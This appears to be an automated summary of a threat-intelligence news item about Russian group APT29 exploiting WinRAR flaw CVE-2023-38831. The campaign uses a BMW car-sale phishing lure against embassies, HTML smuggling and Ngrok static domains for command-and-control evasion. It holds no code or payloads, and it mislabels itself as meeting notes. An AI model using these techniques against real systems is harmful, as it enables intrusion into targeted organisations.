November 20, 2023 at 09:42AM
APT29, a state-sponsored Russian hacker group, is exploiting the CVE-2023-38831 vulnerability in WinRAR for cyberattacks. The group is using a BMW car sale lure to target embassy entities. The vulnerability allows for execution of malicious code through crafted .RAR and .ZIP archives. APT29 has been using a Ngrok static domain to communicate with their command and control server and evade detection. The group has previously used the BMW car ad phishing lure to target diplomats in Ukraine. The campaign by APT29 combines the WinRAR vulnerability with novel techniques to enable communication with their malicious server. Other threat actors have also incorporated the vulnerability into their attacks.
Key takeaways from the meeting notes are:
1. A state-sponsored Russian hacker group known as APT29 (also tracked under different names) is leveraging the CVE-2023-38831 vulnerability in WinRAR for cyberattacks.
2. The APT29 group has been targeting embassy entities with a BMW car sale lure.
3. The CVE-2023-38831 vulnerability allows crafting archives that can execute malicious code in the background.
4. Threat actors have been exploiting this vulnerability since April, targeting cryptocurrency and stock trading forums.
5. APT29 has been using a malicious ZIP archive called “DIPLOMATIC-CAR-FOR-SALE-BMW.pdf” to target multiple European countries.
6. APT29 previously used the BMW car ad phishing lure to target diplomats in Ukraine.
7. They combined phishing tactics with the HTML smuggling technique to communicate with their malicious server.
8. APT29 utilized Ngrok’s services, specifically the free static domains feature, to access the command and control server.
9. This method enables them to hide their activity and communicate with compromised systems without detection.
10. The CVE-2023-38831 vulnerability has been exploited by other advanced threat actors, such as APT28, Russian and Chinese state hackers.
11. The campaign from APT29 stands out for its mix of old and new techniques, including the use of the WinRAR vulnerability and Ngrok services.
12. The Ukrainian agency provides indicators of compromise (IoCs) consisting of filenames, email addresses, domains, and corresponding hashes for PowerShell scripts and an email file.